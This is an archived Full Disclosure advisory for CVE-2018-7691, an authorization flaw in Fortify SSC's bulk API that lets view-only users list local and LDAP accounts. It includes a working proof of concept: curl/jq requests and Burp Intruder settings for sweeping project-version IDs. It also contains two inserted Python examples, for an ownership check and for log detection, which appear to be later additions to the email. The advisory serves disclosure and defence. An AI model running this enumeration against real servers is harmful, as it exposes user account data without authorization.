CVE-2018-7691 | The SSC REST API contains Insecure Direct Object Reference (IDOR) vulnerabilities

Related Vulnerabilities: CVE-2018-7691  
                							

<h2 class="m-list"><a href="/fulldisclosure/">Full Disclosure</a>
mailing list archives</h2>
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
<h1 class="m-title">CVE-2018-7691 | The SSC REST API contains Insecure Direct Object Reference (IDOR) vulnerabilities</h1>
<hr>
<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->


<em>From</em>: alt3kx via Fulldisclosure &lt;fulldisclosure () seclists org&gt;


<em>Date</em>: Fri, 14 Dec 2018 10:28:40 +0000


<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->
<hr>
<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
<pre style="margin: 0em;">Details
================
Software: Fortify SSC (Software Security Center)
Version: 17.10, 17.20 &amp; 18.10
Homepage: <a rel="nofollow" href="https://www.microfocus.com/">https://www.microfocus.com/</a>
Advisory report: <a rel="nofollow" href="https://github.com/alt3kx/CVE-2018-7691">https://github.com/alt3kx/CVE-2018-7691</a>
CVE: CVE-2018-7691 at <a rel="nofollow" href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7691">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7691</a>
CVSS: 6.5 (Medium; AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
CWE-639

Description
================
The REST API contains an Insecure Direct Object Reference (IDOR) that allows extracting arbitrary details of local and
LDAP users via the POST method.

Vulnerability
================
Fortify SSC (Software Security Center) 17.10 does not properly check ownership of "authEntities", which allows remote
authenticated (view-only) users to read arbitrary details through the API bulk request by targeting
/api/v1/projectVersions/{NUMBER}/authEntities.

Note: the View-only role is a restricted role: it can view results but cannot interfere with issue triage or the
remediation process.
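The missing check described above is a CWE-639 authorization bypass: the bulk endpoint authenticates the session but never verifies that the caller is assigned to the project version named in each wrapped sub-request. The Python model below is an added example written for this advisory, not Fortify SSC code; the project-version data, the session table, the regex and the function names (bulk, handle_sub_request, sample_request, sub_codes, entity_names) are all constructed assumptions. One handler serves both the flawed behaviour (authentication only) and the hardened one, with the ownership check applied to every sub-request so that wrapping a URI in /bulk cannot route around it.

```python
"""Added illustration (not Fortify SSC code): a /api/v1/bulk dispatcher that
applies an ownership check to every wrapped sub-request, beside the unchecked
behaviour that CWE-639 describes. All names and data below are constructed."""
import re
from urllib.parse import urlparse

# Constructed sample data: project versions and the users assigned to each
# (the "authEntities" of that version). Only assigned users may list them.
PROJECT_VERSIONS = {
    3: {"name": "webapp 1.0", "authEntities": ["admin", "sca", "alex"]},
    7: {"name": "backend 2.1", "authEntities": ["admin", "sca"]},
}

# Constructed session table standing in for the real session store.
SESSIONS = {"JSESSIONID=SESSION-OF-ALEX": "alex", "JSESSIONID=SESSION-OF-SCA": "sca"}

AUTH_ENTITIES_RE = re.compile(r"^/ssc/api/v1/projectVersions/(\d+)/authEntities$")


def authenticate(cookie):
    """Resolve a session cookie to a username, or None when unauthenticated."""
    return SESSIONS.get(cookie)


def handle_sub_request(uri, verb, caller, check_ownership):
    """Serve one wrapped request and return its body. The only difference
    between the flawed and hardened dispatchers is check_ownership."""
    match = AUTH_ENTITIES_RE.match(urlparse(uri).path)
    if verb != "GET" or match is None:
        return {"responseCode": 404, "data": []}
    version = PROJECT_VERSIONS.get(int(match.group(1)))
    if version is None:
        return {"responseCode": 404, "data": []}
    # Object-level authorization: the caller must be assigned to this project
    # version. Doing it here means /bulk and the direct endpoint share the check.
    if check_ownership and caller not in version["authEntities"]:
        return {"responseCode": 403, "data": []}
    return {"responseCode": 200,
            "data": [{"entityName": name} for name in version["authEntities"]]}


def bulk(cookie, body, check_ownership=True):
    """POST /api/v1/bulk. check_ownership=False reproduces the flaw:
    the session is authenticated, but no sub-request is authorized."""
    caller = authenticate(cookie)
    if caller is None:
        return {"responseCode": 401, "data": []}
    responses = [{"body": handle_sub_request(r["uri"], r["httpVerb"], caller, check_ownership)}
                 for r in body["requests"]]
    return {"responseCode": 200, "data": [{"responses": responses}]}


def sample_request(*pv_ids):
    """Body of the advisory's bulk request for one or more project versions."""
    return {"requests": [
        {"uri": f"https://fortifyserver.com/ssc/api/v1/projectVersions/{pv_id}/authEntities",
         "httpVerb": "GET"} for pv_id in pv_ids]}


def sub_codes(result):
    """Same projection as jq '.data[] .responses[] .body .responseCode'."""
    return [r["body"]["responseCode"] for d in result["data"] for r in d["responses"]]


def entity_names(result):
    """Same projection as jq '.data[] .responses[] .body .data[] .entityName'."""
    return [e["entityName"] for d in result["data"] for r in d["responses"]
            for e in r["body"]["data"]]


if __name__ == "__main__":
    alex = "JSESSIONID=SESSION-OF-ALEX"
    print("unchecked:", sub_codes(bulk(alex, sample_request(7), check_ownership=False)))  # [200]
    print("hardened: ", sub_codes(bulk(alex, sample_request(7))))                         # [403]
    print("own version:", entity_names(bulk(alex, sample_request(3))))                    # ['admin', 'sca', 'alex']
```

The design point is where the check lives: inside the per-object handler rather than in the outer /bulk controller, so every path that reaches the object (direct endpoint, bulk wrapper, any future batch API) is covered by the same authorization decision, and a bypass through a new wrapper cannot reappear.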

Proof of concept
================

Pre-requisites:

- curl command deployed (Windows or Linux)
- jq command deployed (for parsing JSON fields) (Windows or Linux)
- Burp Suite Free/Pro deployed, or any other proxy to catch/send the request (optional)

Step (1): Log on to the fortifyserver.com SSC (Software Security Center) 17.10 instance with your view-only (restricted) role.

The URL is normally available as follows:

Target: <a rel="nofollow" href="https://fortifyserver.com/ssc/#/">https://fortifyserver.com/ssc/#/</a>

Step (2): Once logged in, extract the Cookie header; its format is normally as follows:
"Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;"

Step (3): Start Burp Suite Free/Pro or any other HTTP proxy (optional), listening on port 8080 by default

Step (4): The offending POST is:

POST /ssc/api/v1/bulk HTTP/1.1
Host: fortifyserver.com
Connection: close
Accept: application/json, text/plain, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;
Content-Length: 123

{"requests":[{"uri":"<a rel="nofollow" href="https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities">https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities</a>","httpVerb":"GET"}]}

Step (5): Send a first POST request (including the session cookie) and parse the JSON response with the curl and jq
commands as follows:

# curl -s -k -X POST <a rel="nofollow" href="https://fortifyserver.com/ssc/api/v1/bulk">https://fortifyserver.com/ssc/api/v1/bulk</a> \
-H "Host: fortifyserver.com" \
-H "Connection: close" \
-H "Accept: application/json, text/plain, */*" \
-H "X-Requested-With: XMLHttpRequest" \
-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36" \
-H "Content-Type: application/json;charset=UTF-8" \
-H "Accept-Encoding: gzip, deflate" \
-H "Accept-Language: en-US,en;q=0.9" \
-H "Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;" \
-b "JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;" \
--data-binary "{\"requests\":[{\"uri\":\"https://fortifyserver.com/ssc/api/v1/projectVersions/0/authEntities\",\"httpVerb\":\"GET\"}]}" \
--proxy <a rel="nofollow" href="http://127.0.0.1:8080">http://127.0.0.1:8080</a> | jq '.data[] .responses[] .body .responseCode'

You should see the following response:

200

Step (6): Now extract all local and LDAP users registered in the Fortify SSC server:

Payload: /api/v1/projectVersions/{NUMBER}/authEntities; see the "--data-binary" field below and change the number as
follows:

# curl -s -k -X POST <a rel="nofollow" href="https://fortifyserver.com/ssc/api/v1/bulk">https://fortifyserver.com/ssc/api/v1/bulk</a> \
-H "Host: fortifyserver.com" \
-H "Connection: close" \
-H "Accept: application/json, text/plain, */*" \
-H "X-Requested-With: XMLHttpRequest" \
-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36" \
-H "Content-Type: application/json;charset=UTF-8" \
-H "Accept-Encoding: gzip, deflate" \
-H "Accept-Language: en-US,en;q=0.9" \
-H "Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;" \
-b "JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;" \
--data-binary "{\"requests\":[{\"uri\":\"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities\",\"httpVerb\":\"GET\"}]}" \
--proxy <a rel="nofollow" href="http://127.0.0.1:8080">http://127.0.0.1:8080</a> | jq '.data[] .responses[] .body .data[] .entityName'

You should see the following response listing the available users:

"admin"
"sca"
"alex"

[../snip]

Step (7): To automate with Burp Suite Pro/Free, choose:

Payload Positions ("Intruder" tab -&gt; "Positions"), highlighting as follows:

-&gt; /api/v1/projectVersions/§1§/authEntities

Payload set ("Intruder" tab -&gt; "Payloads") with the following data:

-&gt; Payload set: 1
-&gt; Payload type: Numbers

Payload Options [Numbers]:

-&gt; Type: Sequential
-&gt; From: 0
-&gt; To: 1500
-&gt; Step: 1

Then start the attack…
Have fun!

Mitigations
================
Install the latest patches available here:
<a rel="nofollow" href="https://softwaresupport.softwaregrp.com/doc/KM03298201">https://softwaresupport.softwaregrp.com/doc/KM03298201</a>
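Patching closes the hole; the access pattern behind step 7 (one principal walking sequential projectVersions IDs through /api/v1/bulk) is also worth alerting on, because after the hotfix the same sweep turns into a burst of 403 responses instead of silently succeeding. The Python below is an added example written for this advisory, not part of it and not vendor code. It assumes an application audit log, one JSON object per line in time order, that records the authenticated user, the wrapped URI of each bulk sub-request and its status code; the log lines it processes are constructed in build_sample_log rather than read from real traffic, and find_enumeration and count_forbidden are names chosen here. It goes slightly beyond the advisory's fixed 0..1500 range by counting distinct IDs over a sliding time window, so the threshold is independent of how many versions the server actually has.

```python
"""Added illustration (not from the advisory or the vendor): two log-side
signals for the enumeration pattern behind CVE-2018-7691. Assumes an
application audit log, one JSON object per line, that records the
authenticated user, the wrapped URI of each /api/v1/bulk sub-request and its
status code, in time order. All log lines below are constructed."""
import json
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

PV_RE = re.compile(r"/api/v1/projectVersions/(\d+)/")
TS_FMT = "%Y-%m-%dT%H:%M:%SZ"


def build_sample_log():
    """Constructed sample traffic against a patched server (not real logs):
    one user walks project-version IDs 0..29 at one request per second while
    only being assigned to version 3; a second user touches just its own versions."""
    base = datetime(2018, 12, 12, 10, 0, 0)
    events = [(base + timedelta(seconds=i), "alex", i, 200 if i == 3 else 403)
              for i in range(30)]
    events += [(base + timedelta(seconds=5), "sca", 3, 200),
               (base + timedelta(seconds=40), "sca", 7, 200)]
    events.sort(key=lambda e: e[0])
    return [json.dumps({"ts": ts.strftime(TS_FMT), "user": user,
                        "uri": f"/ssc/api/v1/projectVersions/{pv}/authEntities",
                        "status": status})
            for ts, user, pv, status in events]


def parse(lines):
    """Yield (timestamp, user, project-version id, status) for lines that
    reference a project version; other lines are skipped."""
    for line in lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        m = PV_RE.search(ev["uri"])
        if m is None:
            continue
        yield datetime.strptime(ev["ts"], TS_FMT), ev["user"], int(m.group(1)), ev["status"]


def find_enumeration(lines, window_seconds=60, min_distinct=20):
    """Signal 1 (valid before and after the fix): a user touching min_distinct
    or more distinct project-version IDs inside any window_seconds-long span.
    Returns {user: peak distinct count} for users over the threshold."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)                    # user -> (ts, pv_id) inside the window
    live = defaultdict(lambda: defaultdict(int))   # user -> pv_id -> hits inside the window
    peaks = {}
    for ts, user, pv_id, _status in parse(lines):
        recent[user].append((ts, pv_id))
        live[user][pv_id] += 1
        # Slide the window: drop events older than `window` relative to this one.
        # The current event is always kept, so the deque never empties here.
        while ts - recent[user][0][0] > window:
            _old_ts, old_id = recent[user].popleft()
            live[user][old_id] -= 1
            if live[user][old_id] == 0:
                del live[user][old_id]
        distinct = len(live[user])
        if distinct >= min_distinct:
            peaks[user] = max(peaks.get(user, 0), distinct)
    return peaks


def count_forbidden(lines):
    """Signal 2 (after the fix): per-user count of 403s on authEntities reads.
    A patched server turns the same sweep into a burst of 403s."""
    forbidden = defaultdict(int)
    for _ts, user, _pv_id, status in parse(lines):
        if status == 403:
            forbidden[user] += 1
    return dict(forbidden)


if __name__ == "__main__":
    log = build_sample_log()
    print("enumeration:", find_enumeration(log))   # {'alex': 30}
    print("forbidden:  ", count_forbidden(log))    # {'alex': 29}
```

The distinct-ID signal is the one to rely on before a patch lands, since the vulnerable server answers every probe with 200 and nothing else in the log looks abnormal; the 403 counter only becomes meaningful once ownership is enforced, at which point a view-only session collecting dozens of 403s on authEntities is a clear indicator.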

Disclosure policy
================
We believe in responsible disclosure.
Please contact us on Alex Hernandez aka alt3kx  (at) protonmail com to acknowledge this report.

This vulnerability will be published if we do not receive a response to this report within 10 days.

Timeline
================

2018-05-24: Discovered
2018-05-25: Retest PRO environment
2018-05-31: Vendor notification, two issues found
2018-05-31: Vendor feedback received
2018-06-01: Internal communication
2018-06-01: Vendor feedback, two issues are confirmed
2018-06-05: Vendor notification, new issue found
2018-06-06: Vendor feedback, evaluating High submission
2018-06-08: Vendor feedback, High issue is confirmed
2018-06-19: Researcher, reminder sent
2018-06-22: Vendor feedback, summary of CVEs handled as official way
2018-06-26: Vendor feedback, official Hotfix for High issue available to test
2018-06-29: Researcher feedback
2018-07-02: Researcher feedback
2018-07-04: Researcher feedback, Hotfix tested on QA environment
2018-07-05: Vendor feedback, fixes scheduled Aug/Sep 2018
2018-08-02: Reminder to vendor, feedback received OK!
2018-09-26: Reminder to vendor, feedback received OK!
2018-09-26: Fixes received from the vendor
2018-10-02: Internal QA environment failed, rebuilding the researcher's ecosystem
2018-10-11: Internal QA environment failed, rebuilding the researcher's ecosystem
2018-10-11: Feedback from the vendor, technical details provided to the researcher
2018-10-16: Fixes now tested on QA environment
2018-11-08: Reminder received from the vendor, feedback provided by researcher
2018-11-09: Re-test fixes on QA environment
2018-11-15: Re-test fixes on QA environment, now with SSC 18.20 version deployed
2018-11-21: Researcher feedback
2018-11-23: Fixes working well/confirmed by researcher
2018-11-23: Vendor feedback, final details to disclose the CVE and official fixes available for customers.
2018-11-26: Vendor feedback, CVE and official fixes to be disclosed
2018-11-26: Agreements with the vendor to publish the CVE/Advisory.
2018-12-12: Public report

Discovered by:
Alex Hernandez aka alt3kx:
================
Please visit <a rel="nofollow" href="https://github.com/alt3kx">https://github.com/alt3kx</a> for more information.

My current exploit list @exploit-db:
<a rel="nofollow" href="https://www.exploit-db.com/author/?a=1074">https://www.exploit-db.com/author/?a=1074</a> &amp; <a rel="nofollow" href="https://www.exploit-db.com/author/?a=9576">https://www.exploit-db.com/author/?a=9576</a>

_______________________________________________
Sent through the Full Disclosure mailing list
<a rel="nofollow" href="https://nmap.org/mailman/listinfo/fulldisclosure">https://nmap.org/mailman/listinfo/fulldisclosure</a>
Web Archives &amp; RSS: <a rel="nofollow" href="http://seclists.org/fulldisclosure/">http://seclists.org/fulldisclosure/</a></pre>
<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->